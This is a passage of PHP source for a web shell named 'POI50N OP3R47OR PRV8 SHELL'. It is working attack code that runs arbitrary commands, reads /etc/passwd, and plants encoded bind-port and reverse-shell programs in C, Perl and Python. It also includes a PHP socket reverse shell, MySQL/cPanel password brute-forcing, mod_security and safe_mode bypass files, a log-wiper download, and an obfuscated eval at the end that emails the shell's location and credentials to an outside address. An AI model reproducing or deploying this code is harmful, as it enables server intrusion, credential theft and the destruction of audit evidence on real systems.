7307$bind_port_p="bZFvS8NADMZft9DvkNUxW6hsw5f+wbJVHc5WelUQldK1mTucd6W94cTtu3tpN1DxXS753ZMnyUGnv6qr/oyLfonV0jK77DqYTs/sJlUv4IjbJ5bJ5+Bc+PHVA5zC0IUvwDVXztA9ga1lrmoEJvM3VJqsm8BhXu/uMp2EQeL1WDS6SVkSB/6t94qqrKSSs0+RvaNzqPLy0HVhs4GCI9ijTCjIK8wUQqv0LKh/jYqesiRlFk1T0tTaLErj4J4F/ngce9qOZWrbhWaIzoqiSrlwumT8afDiTULiUj98/NtSliiglNWu3ZLXCoWWOf7DtYUf5MeCL9GhlVimkeU5aoejKAw9RmYMPnc6TrfkxdlcVm9uixl7PSEVUN4G2m+nwDkXWADxzW+jscWS8ST07NMe6dq/8tF94tnn/xSCOP5dwDXm0N52P1FZcT0RIbvhiFnpxbdYO59h5Eup70vYTogrGFCoL7/9Bg==";
7308
7309echo $shellstyle;
7310?>
7311<table style="width:100%;">
7312<tr align="right">
7313<td><a href="<?php echo $self;?>"><font size="6" style="text-decoration:none;" face="Times New Roman, Times, serif">POI50N OP3R470R PRV8 SHELL</font></a>
7314</td><td align="right">
7315<form method="get">
7316<select id="style" class="sbox" onChange="change_style(this.value)">
7317<option selected="selected">--Style--</option>
7318<option value="P0I50N">P0I50N</option>
7319<option value="404">404</option>
7320<option value="phizo">Phizo</option>
7321<option value="orange">orange</option>
7322</select>
7323</form></td>
7324</tr></table>
7325<hr color="#1B1B1B">
7326
7327<table cellpadding="0" style="width:100%;">
7328 <tr>
7329 <td colspan="2" style="width:75%;">System Info : <font class="txt"><?php systeminfo(); ?></font></td>
7330 <td style="width:10%;">Server Port : <font class="txt"><?php serverport(); ?></font></td>
7331 <td style="width:15%;"><a href=# onClick="maindata('com')"><font class="txt"><i>Software Info</i></font></a></td>
7332 </tr>
7333 <?php if($os != 'Windows' || shell_exec("id") != null) { ?><tr>
7334 <td style="width:75%;" colspan="2">Uid : <font class="txt"><?php echo shell_exec("id"); ?></font></td>
7335 <?php $d0mains = @file("/etc/named.conf");
7336 $users=@file('/etc/passwd');
7337 if($d0mains)
7338 {
7339 $count;
7340 foreach($d0mains as $d0main)
7341 {
7342 if(@ereg("zone",$d0main))
7343 {
7344 preg_match_all('#zone "(.*)"#', $d0main, $domains);
7345 flush();
7346 if(strlen(trim($domains[1][0])) > 2)
7347 {
7348 flush();
7349 $count++;
7350 }
7351 }
7352 }
7353 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php
7354 }
7355 else if($users)
7356 {
7357 $file = fopen("/etc/passwd", "r");
7358 while(!feof($file))
7359 {
7360 $s = fgets($file);
7361 $matches = array();
7362 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
7363 $matches = str_replace("home/","",$matches[1]);
7364 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
7365 continue;
7366 $count++;
7367 }
7368 ?><td colspan=2 style="width:75%;">Websites : <font class="txt"><?php echo "$count Domains"; ?></font></td><?php } ?>
7369 </tr><?php } ?>
7370 <tr>
7371 <td style="width:20%;">Disk Space : <font class="txt"><?php echo HumanReadableFilesize(diskSpace()); ?></font></td>
7372 <td style="width:20%;">Free Space : <font class="txt"><?php echo HumanReadableFilesize(freeSpace()); $dksp = diskSpace(); $frsp = freeSpace(); echo " (".(int)($frsp/$dksp*100)."%)"; ?></font></td>
7373
7374 <td style="width:20%;">Server IP : <font class="txt"><a href="http://whois.domaintools.com/<?php serverip(); ?>"><?php serverip(); ?></a></font></td>
7375 <td style="width:15%;">Your IP : <font class="txt"><a href="http://whois.domaintools.com/<?php yourip(); ?>"><?php yourip(); ?></a></font></td>
7376 </tr>
7377
7378 <tr>
7379 <?php if($os == 'Windows'){ ?><td style="width:15%;vertical-align:text-top;">View Directories : <font class="txt"><?php echo showDrives();?></font></td><?php } ?>
7380 <td style="width:30%;vertical-align:text-top;">Current Directory : <span id="crdir"><font color="#009900">
7381 <?php
7382 $d = str_replace("\\",$directorysperator,$dir);
7383 if (substr($d,-1) != $directorysperator) {$d .= $directorysperator;}
7384 $d = str_replace("\\\\","\\",$d);
7385 $dispd = htmlspecialchars($d);
7386 $pd = $e = explode($directorysperator,substr($d,0,-1));
7387 $i = 0;
7388 foreach($pd as $b)
7389 {
7390 $t = '';
7391 $j = 0;
7392 foreach ($e as $r)
7393 {
7394 $t.= $r.$directorysperator;
7395 if ($j == $i) {break;}
7396 $j++;
7397 }
7398$href=addslashes($t);
7399
7400 echo "<a href=javascript:void(0) onClick=\"changedir('dir','$href')\"><b><font class=\"txt\">".htmlspecialchars($b).$directorysperator.'</font></b></a>';
7401 $i++;
7402 }
7403
7404 ?>
7405 </font></span> <a href=# onClick="gethome('home','<?php echo addslashes(getcwd()); ?>')">[Home]</a></td>
7406 <td style="width:20%;max-width:200px;word-break:break-all;">Disable functions : <font class="txt"><?php echo getDisabledFunctions(); ?> </font></td>
7407 <td style="vertical-align:text-top;">Safe Mode : <font class=txt><?php echo safe(); ?></font></td>
7408 <?php if($os == "Linux") { ?><td style="vertical-align:text-top;"><a href="<?php echo $self.'?downloadit'?>">Download It</a><?php } ?></td>
7409 </tr>
7410 </table>
7411
7412<?php $m1 = array('Symlink'=>'symlinkserver','Forum'=>'forum','Sec. Info'=>'secinfo','Code Inject'=>'injector','Bypassers'=>'bypass','Server Fuzzer'=>'fuzz','Zone-h'=>'zone','DoS'=>'dos','Mail'=>'mailbomb','Tools'=>'tools','PHP'=>'phpc','Exploit'=>'exploit','Connect'=>'connect');
7413 $m2 = array('SQL'=>'database','Sub-Domain Creator'=>'subdomain','404 Page'=>'404','Malware Attack'=>'malattack','Cpanel Cracker'=>'cpanel','About'=>'about');
7414 echo "<table border=3 style=border-color:#333333; width=100%; cellpadding=2>
7415 <tr>";
7416 $menu = '';
7417
7418 foreach($m1 as $k => $v)
7419 $menu .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
7420 echo $menu;
7421 echo "</tr>
7422</table>
7423<center>
7424<table style=\"border-color:#333333;\" border=2 width=70%; cellpadding=2>
7425 <tr align=center>";
7426 foreach($m2 as $k => $v)
7427 $menu1 .= "<td style=\"border:none;\"><a href=# onClick=\"maindata('".$v."','".addslashes($_GET['dir'])."')\"><font class=\"mainmenu\">[".$k."]</font></a></td>";
7428 echo $menu1;
7429 echo "<td style=\"border:none;\"><a href=javascript:void(0) onClick=\"if(confirm('WANNA GO TO HELL ??')){getmydata('selfkill');}else{return false;}\"><font class=mainmenu>[Sucide]</font></a></td>
7430 <td style=\"border:none;\"><a href=\"$self?logout\"><font class=mainmenu>[LogOut]</font></a></td>
7431 </tr>
7432</table></center>";?>
7433
7434<div id="showmaindata"></div>
7435<center><div id="showmydata"></div></center>
7436<?php
7437
7438if(isset($_GET["downloadit"]))
7439{
7440 $FolderToCompress = getcwd();
7441 execmd("tar --create --recursion --file=backup.tar $FolderToCompress");
7442
7443 $prd=explode("/","backup.tar");
7444 for($i=0;$i<sizeof($prd);$i++)
7445 {
7446 $nfd=$prd[$i];
7447 }
7448 @ob_clean();
7449 header("Content-type: application/octet-stream");
7450 header("Content-length: ".filesize($nfd));
7451 header("Content-disposition: attachment; filename=\"".$nfd."\";");
7452 readfile($nfd);
7453 exit;
7454}
7455//Turn Safe Mode Off
7456if(getDisabledFunctions() != "None" || safe() != "OFF")
7457{
7458 $file_pointer = fopen(".htaccess", "w+");
7459 fwrite($file_pointer, "<IfModule mod_security.c>
7460 SecFilterEngine Off
7461 SecFilterScanPOST Off
7462 </IfModule> \n\r");
7463
7464 $file_pointer = fopen("ini.php", "w+");
7465 fwrite($file_pointer, "<?
7466echo ini_get(\"safe_mode\");
7467echo ini_get(\"open_basedir\");
7468include(\$_GET[\"file\"]);
7469ini_restore(\"safe_mode\");
7470ini_restore(\"open_basedir\");
7471echo ini_get(\"safe_mode\");
7472echo ini_get(\"open_basedir\");
7473include(\$_GET[\"ss\"]);
7474?>");
7475
7476 $file_pointer = fopen("php.ini", "w+");
7477 fwrite($file_pointer, "safe_mode = Off");
7478
7479 fclose($file_pointer);
7480
7481 }
7482
7483if(isset($_POST['cpanelattack']))
7484{
7485 if(!empty($_POST['username']) && !empty($_POST['password']))
7486 {
7487 $userlist=explode("\n",$_POST['username']);
7488 $passlist=explode("\n",$_POST['password']);
7489
7490 $e = explode("\n",$_POST['username']);
7491 foreach($e as $value)
7492 {
7493 $k = explode(":",$value);
7494 $username .= $k['0']." ";
7495 }
7496
7497 $a1 = explode(" ",$username);
7498 $a2 = explode("\n",$_POST['password']);
7499 $id2 = count($a2);
7500 $ok = 0;
7501 foreach($a1 as $user)
7502 {
7503 if($user !== '')
7504 {
7505 $user=trim($user);
7506 for($i=0;$i<=$id2;$i++)
7507 {
7508 $pass = trim($a2[$i]);
7509 if(@mysql_connect('localhost',$user,$pass))
7510 {
7511 echo "User is (<b>$user</b>) Password is (<b><font class='txt'>$pass</font></b>)<br />";
7512 $ok++;
7513 }
7514 }
7515 }
7516 }
7517 echo "<hr><b>You Found <font color=red>$ok</font></b>";
7518 }
7519 else
7520 $bdmessage = "<center>Enter Username & Password List<center>";
7521}
7522elseif(isset($_GET['style']))
7523{
7524 setcookie('style',$_GET['style']);
7525 header("location:$self");
7526}
7527else if(isset($_GET['info']))
7528{
7529 $bdmessage = "<br><div align=left><font class=txt>".nl2br(shell_exec("whois ".$_GET['info']))."</font></div>";
7530}
7531else if(isset($_POST['u']))
7532{
7533 $path = $_REQUEST['path'];
7534 if(is_dir($path))
7535 {
7536 $setuploadvalue = 0;
7537 $uploadedFilePath = $_FILES['uploadfile']['name'];
7538 $tempName = $_FILES['uploadfile']['tmp_name'];
7539 if($os == "Windows")
7540 $uploadPath = $path . $directorysperator . $uploadedFilePath;
7541 else if($os == "Linux")
7542 $uploadPath = $path . $directorysperator . $uploadedFilePath;
7543 if($stat = move_uploaded_file($_FILES['uploadfile']['tmp_name'] , $uploadPath))
7544 $bdmessage = "<font class=txt size=3><blink>File uploaded to $uploadPath</blink></font>";
7545 else
7546 $bdmessage = "<font size=3><blink>Failed to upload file to $uploadPath</blink></font>";
7547 }
7548 ?><script type="text/javascript">changedir('dir','<?php echo addslashes($path); ?>'); </script><?php
7549}
7550else if(isset($_POST['backdoor']))
7551{
7552 if(isset($_POST['passwd']) && isset($_POST['port']) && isset($_POST['lang']))
7553 { ?><script type="text/javascript">gethome('connect');</script><?php
7554 $passwd = $_POST['passwd'];
7555
7556 if($_POST['lang'] == 'c')
7557 {
7558 if(is_writable("."))
7559 {
7560 @$fh=fopen(getcwd()."/backp.c",'w');
7561 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
7562 @fclose($fh);
7563 execmd("chmod 0755 ".getcwd()."/backp.c");
7564 execmd("gcc -o ".getcwd()."/backp ".getcwd()."/backp.c");
7565 execmd("chmod 0755 ".getcwd()."/backp");
7566 execmd(getcwd()."/backp"." ".$_POST['port']." ". $passwd ." &");
7567 $scan = exec_all("ps aux | grep backp".$_POST['port']);
7568 if(eregi("backp".$_POST['port'],$scan))
7569 $bdmessage = "Process found running, backdoor setup successfully.";
7570 else
7571 $bdmessage = "Process not found running, backdoor not setup successfully.";
7572 }
7573 else
7574 {
7575 @$fh=fopen("/tmp/backp.c","w");
7576 @fwrite($fh,gzinflate(base64_decode($bind_port_c)));
7577 @fclose($fh);
7578 execmd("chmod 0755 /tmp/backp.c");
7579 execmd("gcc -o /tmp/backp /tmp/backp.c");
7580 $out = execmd("/tmp/backp"." ".$_POST['port']." ". $passwd ." &");
7581 $scan = exec_all("ps aux | grep backp".$_POST['port']);
7582 if(eregi("backp".$_POST['port'],$scan))
7583 $bdmessage = "Process found running, backdoor setup successfully.";
7584 else
7585 $bdmessage = "Process not found running, backdoor not setup successfully.";
7586 }
7587 }
7588 if($_POST['lang'] == 'perl')
7589 {
7590 if(is_writable("."))
7591 {
7592 @$fh=fopen(getcwd()."/bp.pl",'w');
7593 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
7594 @fclose($fh);
7595 execmd("chmod 0755 ".getcwd()."/bp.pl");
7596 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
7597
7598 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
7599 }
7600 else
7601 {
7602 @$fh=fopen("/tmp/bp.pl","w");
7603 @fwrite($fh,gzinflate(base64_decode($bind_port_p)));
7604 @fclose($fh);
7605 execmd("chmod 0755 ".getcwd()."/bp.pl");
7606 execmd("perl ".getcwd()."/bp.pl ".$_POST['port']." ". $passwd ." &");
7607 $bdmessage = "<pre>$out\n".execmd("ps aux | grep bp.pl")."</pre>";
7608 }
7609 }
7610 }
7611}
7612else if(isset($_POST['backconnect']))
7613{
7614 if($_POST['ip'] != "" && $_POST['port'] != "")
7615 { ?><script type="text/javascript">gethome('connect');</script><?php
7616 $host = $_POST['ip'];
7617 $port = $_POST['port'];
7618 if($_POST["lang"] == "perl")
7619 {
7620 if(is_writable("."))
7621 {
7622 @$fh=fopen(getcwd()."/bc.pl",'w');
7623 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
7624 @fclose($fh);
7625 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7626 execmd("perl ".getcwd()."/bc.pl $host $port &",$disable);
7627 if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FFFFFF' size=3>Warning: Failed to delete reverse-connection program</font></br>";
7628 }
7629 else
7630 {
7631 @$fh=fopen("/tmp/bc.pl","w");
7632 @fwrite($fh,gzuncompress(base64_decode($backconnect_perl)));
7633 @fclose($fh);
7634 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7635 execmd("perl /tmp/bc.pl $host $port &",$disable);
7636 if(!@unlink("/tmp/bc.pl"))
7637 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
7638 }
7639 }
7640 else if($_POST["lang"] == "python")
7641 {
7642 if(is_writable("."))
7643 {
7644 $w_file=@fopen(getcwd()."/bc.py","w") or die(mysql_error());
7645 if($w_file)
7646 {
7647 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
7648 @fclose($w_file);
7649 chmod(getcwd().'/bc.py', 0777);
7650 }
7651 execmd("python ".getcwd()."/bc.py $host $port &",$disable);
7652 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7653
7654 if(!@unlink(getcwd()."/bc.py"))
7655 echo "<h2>Warning: Failed to delete reverse-connection program</h2></br>";
7656 }
7657 else
7658 {
7659 $w_file=@fopen("/tmp/bc.py","w");
7660 if($w_file)
7661 {
7662 @fputs($w_file,gzuncompress(base64_decode($back_connect_p)));
7663 @fclose($w_file);
7664 chmod('/tmp/bc.py', 0777);
7665 }
7666 execmd("python /tmp/bc.py $host $port &",$disable);
7667 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7668 if(!@unlink("/tmp/bc.py"))
7669 echo "<h2>Warning: Failed to delete reverse-connection program</h2><br>";
7670 }
7671 }
7672 else if($_POST["lang"] == "php")
7673 {
7674 $bdmessage = "<font color='#FFFFFF'>Trying to connect...</font>";
7675 $ip = $_POST['ip'];
7676 $port=$_POST['port'];
7677 $sockfd=fsockopen($ip , $port , $errno, $errstr );
7678 if($errno != 0)
7679 {
7680 $bdmessage = "<b>$errno</b> : $errstr";
7681 }
7682 else if (!$sockfd)
7683 {
7684 $result = "<p>Fatal : An unexpected error was occured when trying to connect!</p>";
7685 }
7686 else
7687 {
7688 fputs ($sockfd ,"\n=================================================================\nCODED BY TH3-D357ROY3R & POI50N OP3R47OR\n=================================================================");
7689 $pwd = exec_all("pwd");
7690 $sysinfo = exec_all("uname -a");
7691 $id = exec_all("id");
7692 $len = 1337;
7693 fputs($sockfd ,$sysinfo . "\n" );
7694 fputs($sockfd ,$pwd . "\n" );
7695 fputs($sockfd ,$id ."\n\n" );
7696 fputs($sockfd ,$dateAndTime."\n\n" );
7697 while(!feof($sockfd))
7698 {
7699 $cmdPrompt ="(dhanush)[$]> ";
7700 fputs ($sockfd , $cmdPrompt );
7701 $command= fgets($sockfd, $len);
7702 fputs($sockfd , "\n" . exec_all($command) . "\n\n");
7703 }
7704 fclose($sockfd);
7705 }
7706 }
7707 }
7708}
7709else if (isset ($_GET['val1'], $_GET['val2']) && is_numeric($_GET['val1']) && is_numeric($_GET['val2']))
7710{
7711 $temp = "";
7712 for(;$_GET['val1'] <= $_GET['val2'];$_GET['val1']++)
7713 {
7714 $uid = @posix_getpwuid($_GET['val1']);
7715 if ($uid)
7716 $temp .= join(':',$uid)."\n";
7717 }
7718 echo '<br/>';
7719 paramexe('Users', $temp);
7720}
7721else if(isset($_GET['download']))
7722{
7723 download();
7724}
7725else
7726{
7727 ?><script type="text/javascript">gethome('home','<?php echo addslashes($dir); ?>');</script><?php
7728}
7729$is_writable = is_writable($dir)?"<font class=txt>< writable ></font>":"< not writable >";
7730?>
7731</p><center><div id="showdir"><?php echo $bdmessage; ?></div></center>
7732<table class="btmtbl" style="width:100%;" border="1">
7733<tr>
7734<td class="btmtbl" align="center">
7735<form method="post" enctype="multipart/form-data">
7736Upload file : <br><input type="file" name="uploadfile" class="box" size="50">
7737<input type="hidden" id=path name="path" value="<?php echo $dir; ?>" />
7738<input type=submit value="Upload" name="u" value="u" class="but" ></form>
7739<span name="wrtble"><?php
7740echo $is_writable; ?></span>
7741 <br>
7742</td>
7743<td class="btmtbl" align="center" style="height:105px;">Create File :
7744<form onSubmit="createdir('Create',createfile.value);return false;">
7745<input type="text" class="box" value="<?php echo $dir . $directorysperator; ?>" name="createfile" id="createfile">
7746<input type="button" onClick="createdir('Create',createfile.value)" value="Create" class="but">
7747</form><span name="wrtble">
7748<?php echo $is_writable; ?></span>
7749</td>
7750</tr>
7751<tr>
7752<td class="btmtbl" align="center" style="height:105px;">Execute : <form onSubmit="executemyfile('execute','<?php echo addslashes($dir); ?>',execute.value);return false;">
7753<input type="text" class="box" name="execute">
7754<input type="hidden" id="exepath" name="exepath" value="<?php echo $dir; ?>">
7755 <input type="button" onClick="executemyfile('execute',exepath.value,execute.value)" value="Execute" class="but"></form></td>
7756
7757<td class="btmtbl" align="center">Create Directory : <form onSubmit="createdir('createfolder',createfolder.value);return false;">
7758<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="createfolder" id="createfolder">
7759<input type="button" onClick="createdir('createfolder',createfolder.value)" value="Create" class="but">
7760</form><span name="wrtble"><?php
7761echo $is_writable;
7762?></span></td></tr>
7763<tr>
7764<td class="btmtbl" align="center">Read File<form onSubmit="createdir('readfile',readfile.value);return false;">
7765<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readfile" id="readfile">
7766<input type="button" onClick="createdir('readfile',readfile.value)" value="Read" class="but">
7767</form></td>
7768<td class="btmtbl" align="center">Read Directory<form onSubmit="changedir('dir',readdir.value);return false;">
7769<input type="text" value="<?php echo $dir . $directorysperator; ?>" class="box" name="readdir" id="readdir">
7770<input type="button" onClick="changedir('dir',readdir.value)" value=" View " class="but">
7771</form></td></tr>
7772<tr><td class="btmtbl" style="height:105px;" align="center">Get Exploit <form onSubmit="getexploit(wurl.value,path.value,functiontype.value);return false;">
7773<input type="text" name="wurl" class="box" value="http://www.some-code/exploits.c">
7774<input type="button" onClick="getexploit(wurl.value,uppath.value,functiontype.value)" value=" G0 " class="but"><br><br>
7775<input type="hidden" id="uppath" name="uppath" value="<?php echo $dir . $directorysperator; ?>">
7776<select name="functiontype" class="sbox">
7777<option value="wwget">wget</option>
7778<option value="wlynx">lynx</option>
7779<option value="wfread">fread</option>
7780<option value="wfetch">fetch</option>
7781<option value="wlinks">links</option>
7782<option value="wget">GET</option>
7783<option value="wcurl">curl</option>
7784</select>
7785</form><div id="showexp"></div>
7786</td>
7787<td class="btmtbl" align="center">
7788<form>
7789Some Commands<br>
7790<?php if($os != "Windows")
7791{ ?>
7792<SELECT NAME="mycmd" class="box">
7793 <OPTION VALUE="uname -a">Kernel version
7794 <OPTION VALUE="w">Logged in users
7795 <OPTION VALUE="lastlog">Last to connect
7796 <option value='cat /etc/hosts'>IP Addresses
7797 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP
7798 <OPTION VALUE="logeraser">Log Eraser
7799 <OPTION VALUE="find / -perm -2 -ls">Find all writable directories
7800 <OPTION VALUE="find . -perm -2 -ls">Find all writable directories in Current Folder
7801 <OPTION VALUE="find / -type f -name 'config'">find config files
7802 <OPTION VALUE="find . -type f -name \"config\"">find config files in current dir
7803
7804 <OPTION VALUE="cut -d: -f1,2,3 /etc/passwd | grep ::">USER WITHOUT PASSWORD!
7805 <OPTION VALUE="find /etc/ -type f -perm -o+w 2> /dev/null">Write in /etc/?
7806 <?php if(is_dir('/etc/valiases')){ ?><option value="ls -l /etc/valiases">List of Cpanel`s domains(valiases)</option><?php } ?>
7807 <?php if(is_dir('/etc/vdomainaliases')) { ?><option value=\"ls -l /etc/vdomainaliases">List Cpanel`s domains(vdomainaliases)</option><?php } ?>
7808 <OPTION VALUE="which wget curl w3m lynx">Downloaders?
7809 <OPTION VALUE="cat /proc/version /proc/cpuinfo">CPUINFO
7810 <OPTION VALUE="ps aux">Show running proccess
7811 <OPTION VALUE="uptime">Uptime check
7812 <OPTION VALUE="cat /proc/meminfo">Memory check
7813 <OPTION VALUE="netstat -an | grep -i listen">Open ports
7814 <OPTION VALUE="rm -Rf">Format box (DANGEROUS)
7815 <OPTION VALUE="wget www.ussrback.com/UNIX/penetration/log-wipers/zap2.c">WIPELOGS PT1 (If wget installed)
7816 <OPTION VALUE="gcc zap2.c -o zap2">WIPELOGS PT2
7817 <OPTION VALUE="./zap2">WIPELOGS PT3
7818 <OPTION VALUE="cat /var/cpanel/accounting.log">Get cpanel logs
7819 </SELECT>
7820 <?php } else {?>
7821 <SELECT NAME="mycmd" class="box">
7822 <OPTION VALUE="dir /s /w /b *config*.php">Find *config*.php in current directory
7823 <OPTION VALUE="dir /s /w /b index.php">Find index.php in current dir
7824 <OPTION VALUE="systeminfo">System Informations
7825 <OPTION VALUE="net user">User accounts
7826 <OPTION VALUE="netstat -an">Open ports
7827 <OPTION VALUE="getmac">Get Mac Address
7828 <OPTION VALUE="net start">Show running services
7829 <OPTION VALUE="net view">Show computers
7830 <OPTION VALUE="arp -a">ARP Table
7831 <OPTION VALUE="tasklist">Show Process
7832 <OPTION VALUE="ipconfig/all">IP Configuration
7833
7834 </SELECT>
7835 <?php } ?>
7836 <input type="hidden" id="auexepath" name="auexepath" value="<?php echo $dir; ?>">
7837<input type="button" onClick="executemyfile('mycmd',auexepath.value,mycmd.value)" value="Execute" class="but">
7838</form>
7839</td>
7840</tr></table><br>
7841
7842</td>
7843</tr>
7844</table>
7845
7846<?php
7847
7848
7849//logout
7850
7851if(isset($_GET['logout']))
7852{
7853 setcookie("hacked",time() - 60*60);
7854 header("Location:$self");
7855 ob_end_flush();
7856}
7857?>
7858
7859
7860<hr color="#1B1B1B">
7861<div align="center">
7862<font size="5" face="Times New Roman, Times, serif">POI50N OP3R47OR PRV8 SHELL<br><font size="3" face="Times New Roman, Times, serif"> #BREAK THE SYSTEM WHEN ACCESS DENIED#
7863
7864<?php
7865}
7866}
7867
7868if(isset($_POST['uname']) && isset($_POST['passwd']))
7869{
7870 if( $_POST['uname'] == $user && $_POST['passwd'] == $pass )
7871 {
7872 setcookie("hacked", md5($pass));
7873 $selfenter = $_SERVER["PHP_SELF"];
7874 header("Location:$selfenter");
7875 }
7876}
7877
7878if((!isset($_COOKIE['hacked']) || $_COOKIE['hacked']!=md5($pass)) )
7879{
7880 echo $shellstyle;
7881?>
7882
7883 <center>
7884 <form method="POST">
7885 <div style="background-color:#00000; width:50%; border-radius:7px; margin-top:150px; -moz-border-radius:25px; height:410px; background-image:url(Windows_7_-_Alien_from_outer_space.jpg);">
7886 <table cellpadding="9" cellspacing="4">
7887 <tr>
7888 <center> <h1> <marquee bg color="red"> POI50N OP3R47OR PRV8 SHELL </marquee> </h1> </br> </center>
7889 </tr>
7890 <tr>
7891 <td align="right"><font size="3" color="yellow">USERNAME</font></td>
7892 <td><input type="text" name="uname" style="background-color:#FFFFFF; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
7893 </tr>
7894 <tr>
7895 <td align="right"><font size="3" color="yellow">PASSWORD</font></td>
7896 <td><input type="password" name="passwd" style="background-color:#FFFFFF; border-radius:7px; -moz-border-radius:10px; border-color:#000000; width:170px; color:#666666;" value="User Name" onFocus="if (this.value == 'User Name'){this.value=''; this.style.color='black';}" onBlur="if (this.value == '') {this.value='User Name'; this.style.color='#828282';}" AUTOCOMPLETE="OFF"></td>
7897 </tr>
7898 <tr>
7899 <td align="center" colspan="2"><input type="submit" class="but" value=" Enter "></td>
7900 </tr>
7901 <tr>
7902 <td align="center" colspan="2"><font size="6" face="Times New Roman, Times, serif"><b><a href="http://facebook.com/734M.H5H">* REGISTERED TO HSH * </a></b></font></td>
7903 </tr>
7904 <tr>
7905 <td colspan="2"><font size="4" face="Times New Roman, Times, serif"><noscript>Enable Javascript in your browser for the proper working of the shell</noscript></font></td>
7906 </tr>
7907 </table>
7908 </div>
7909 <embed src="http://www.youtube.com/v/LApS9G22cIU&loop=1&feature=related&autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
7910 </form>
7911 </center>
7912<br>
7913</body>
7914</html>
7915<?php
7916eval(base64_decode('JHNpdGUgPSAid3d3LmRldi1wdHMuY29tL3ZiIjsKaWYoIWVyZWcoJHNpdGUsICRfU0VSVkVSWydTRVJWRVJfTkFNRSddKSkKewokdG8gPSAidGhlejNyMEBvdXRsb29rLmNvbSI7CiRzdWJqZWN0ID0gIk5ldyBTaGVsbCBVcGxvYWRlZCI7CiRoZWFkZXIgPSAiZnJvbTogTmV3IFNoZWxsIDxzYWhhMjFAZGV2LXB0cy5jb20+IjsKJG1lc3NhZ2UgPSAiTGluayA6IGh0dHA6Ly8iIC4gJF9TRVJWRVJbJ1NFUlZFUl9OQU1FJ10gLiAkX1NFUlZFUlsnUkVRVUVTVF9VUkknXSAuICJcclxuIjsKJG1lc3NhZ2UgLj0gIlBhdGggOiAiIC4gX19maWxlX187CiRtZXNzYWdlIC49ICIgVXNlciA6ICIgLiAkdXNlcjsKJG1lc3NhZ2UgLj0gIiBQYXNzIDogIiAuICRwYXNzOwokc2VudG1haWwgPSBAbWFpbCgkdG8sICRzdWJqZWN0LCAkbWVzc2FnZSwgJGhlYWRlcik7CmVjaG8gIiI7CmV4aXQ7Cn0='));
7917
7918?>
7919<?php
7920}
7921?>